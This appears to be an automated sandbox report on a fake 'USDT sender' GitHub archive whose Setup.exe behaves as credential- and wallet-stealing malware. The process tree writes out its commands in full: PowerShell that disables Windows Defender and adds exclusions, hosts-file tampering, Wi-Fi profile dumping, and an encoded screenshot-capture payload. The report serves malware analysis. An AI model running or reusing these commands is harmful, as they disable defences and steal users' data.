Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 09:00

General

  • Target

    https://github.com/dumbex6/FLASH-USDT-SENDER/archive/refs/heads/main.zip

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/dumbex6/FLASH-USDT-SENDER/archive/refs/heads/main.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fad346f8,0x7ff9fad34708,0x7ff9fad34718
      2⤵
        PID:1864
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:2636
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2740
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
          2⤵
            PID:1520
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
            2⤵
              PID:2380
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
              2⤵
                PID:1200
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
                2⤵
                  PID:3984
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2316
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                  2⤵
                    PID:3340
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                    2⤵
                      PID:4568
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5536 /prefetch:8
                      2⤵
                        PID:4180
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
                        2⤵
                          PID:4852
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                          2⤵
                            PID:400
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                            2⤵
                              PID:640
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5112
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,11543815775921724125,3631067651464019932,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                              2⤵
                                PID:5456
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4592
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:3928
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2524
                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_FLASH-USDT-SENDER-main.zip\FLASH-USDT-SENDER-main\Setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Temp1_FLASH-USDT-SENDER-main.zip\FLASH-USDT-SENDER-main\Setup.exe"
                                    1⤵
                                    • Drops file in Drivers directory
                                    • Maps connected drives based on registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4700
                                    • C:\Windows\system32\attrib.exe
                                      attrib +h +s C:\Users\Admin\AppData\Local\Temp\Temp1_FLASH-USDT-SENDER-main.zip\FLASH-USDT-SENDER-main\Setup.exe
                                      2⤵
                                      • Views/modifies file attributes
                                      PID:4624
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic path win32_VideoController get name
                                      2⤵
                                      • Detects videocard installed
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5152
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic csproduct get UUID
                                      2⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5236
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Temp1_FLASH-USDT-SENDER-main.zip\FLASH-USDT-SENDER-main\Setup.exe
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:5304
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic os get Caption
                                      2⤵
                                        PID:5312
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        wmic cpu get Name
                                        2⤵
                                          PID:5588
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                          2⤵
                                            PID:5656
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            wmic path win32_VideoController get name
                                            2⤵
                                            • Detects videocard installed
                                            PID:5840
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            wmic csproduct get UUID
                                            2⤵
                                              PID:5944
                                            • C:\Windows\system32\attrib.exe
                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                              2⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:5972
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              2⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:6056
                                            • C:\Windows\system32\netsh.exe
                                              netsh wlan show profiles
                                              2⤵
                                                PID:6100
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:4456
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jigjwj0s\jigjwj0s.cmdline"
                                                  3⤵
                                                    PID:5492
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0D4.tmp" "c:\Users\Admin\AppData\Local\Temp\jigjwj0s\CSCD80E0F81D8EC42899DC7C56FE691BC6A.TMP"
                                                      4⤵
                                                        PID:5540
                                                • C:\Windows\system32\OpenWith.exe
                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                  1⤵
                                                  • Modifies registry class
                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5836
                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_FLASH-USDT-SENDER-main.zip\FLASH-USDT-SENDER-main\README.md
                                                    2⤵
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:6016

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  c9c4c494f8fba32d95ba2125f00586a3

                                                  SHA1

                                                  8a600205528aef7953144f1cf6f7a5115e3611de

                                                  SHA256

                                                  a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b

                                                  SHA512

                                                  9d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  4dc6fc5e708279a3310fe55d9c44743d

                                                  SHA1

                                                  a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2

                                                  SHA256

                                                  a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8

                                                  SHA512

                                                  5874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                  Filesize

                                                  124KB

                                                  MD5

                                                  283931227c2c09150552d350499a7444

                                                  SHA1

                                                  f90653186c8a600a32129e5c041d036ea85dd72e

                                                  SHA256

                                                  c6d6530cb7524a898a67d4cdc908dfbd1516792eb02dea648314d63196098c0a

                                                  SHA512

                                                  4ae703c467a218ae0937b492cb46715ebf2eb17f37ccdb614a6ac3412ebe50b389dd3fa284c0965bde299bfa35bbd7a32d3589540d46fc14f9d59931d5a13d1d

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                  Filesize

                                                  255B

                                                  MD5

                                                  d11edf9e08a127c768843acea41d0bc5

                                                  SHA1

                                                  ff1af9b39de4a3f547407fd9864ffdd2bb6c7354

                                                  SHA256

                                                  217e4d9d1412e45abf7a653f72a5ab8b53bc8fc6f377f52a042668a41abc7478

                                                  SHA512

                                                  92c3f0def567b0e2f2523ed25eb9d4abff06070b8be744fea4a6678f25f292439d7bc0c8015eaa6281b7f43149eebb3d3821cd6d6436598481113694b11ddea3

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  5KB

                                                  MD5

                                                  0d8107a8e8724ec03cf5f3e191670fcf

                                                  SHA1

                                                  141a62baab336d0d8db51d9fa495b29010e8c3ab

                                                  SHA256

                                                  f8c44d174d3f503bcbb0f3a45b5bceaca5d1d540bcfb4202c09897af4e0b5de7

                                                  SHA512

                                                  78be9d10fb75701d191b434b7e38118c7666825e8360e9e1c3aff121dc764edb6620936a13c806de18d6b8441b8de81d4012f2c5e9010eb431dd33abee673efe

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  49bb76d481eee71c70ed464050c66dec

                                                  SHA1

                                                  f33d2c41df4df6a00771f1bb53b2e3b51cdd44c9

                                                  SHA256

                                                  e34d59f08c49aecb1f667d062708d36de4c2343c8ef49e8256fa47d5d2631da3

                                                  SHA512

                                                  31e827e6f7c6b9057c8c00ac67dfe464ac58e57974022753d602796c4483bf7da2365af8cf771eda4e35963b16e0046ab245de305426c9610077ee143467d02d

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                  Filesize

                                                  16B

                                                  MD5

                                                  46295cac801e5d4857d09837238a6394

                                                  SHA1

                                                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                  SHA256

                                                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                  SHA512

                                                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                  Filesize

                                                  16B

                                                  MD5

                                                  206702161f94c5cd39fadd03f4014d98

                                                  SHA1

                                                  bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                  SHA256

                                                  1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                  SHA512

                                                  0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  0b212d7d6b37893cf4f1c50b0755ff1e

                                                  SHA1

                                                  5dd3279542a825edafb0b0aa3ddeb7d79b44177b

                                                  SHA256

                                                  98c24f66c65a5de92b2d9367bd94c9eaed3b22603db462bcc9ed0e05daccf4e1

                                                  SHA512

                                                  96eb28c19ab8c95752b84d3fb7bed82cb46c6c67ae54b25b28d36acbde8f09ff1e1e93f51f6043af9b5efa9b027bc534cd3bbc0ceea72197d17b370e23fb88c0

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  10KB

                                                  MD5

                                                  af57b5189b6088feb562e2b9b378dd65

                                                  SHA1

                                                  8e58487ef24bd62b1e9717d053665dce61f1c585

                                                  SHA256

                                                  548aedb0dca8b6eb60f7ea02ac2e410106a91833c74ee6a600d0819983579c7f

                                                  SHA512

                                                  289e8739939d54a8451a765caadd4d97445a0e945edf31f8fa4dd1c619eb38dc89c608a7ba0bd5e91320393d867ba0b3f0b0fdd87f6aff288f33cff24b54c4a8

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  77d622bb1a5b250869a3238b9bc1402b

                                                  SHA1

                                                  d47f4003c2554b9dfc4c16f22460b331886b191b

                                                  SHA256

                                                  f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                  SHA512

                                                  d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  aeceee3981c528bdc5e1c635b65d223d

                                                  SHA1

                                                  de9939ed37edca6772f5cdd29f6a973b36b7d31b

                                                  SHA256

                                                  b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

                                                  SHA512

                                                  df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

                                                • C:\Users\Admin\AppData\Local\Temp\7is7q2UMO8\Display (1).png

                                                  Filesize

                                                  61KB

                                                  MD5

                                                  89d1bc5db8ee78748bf1bc74bd668278

                                                  SHA1

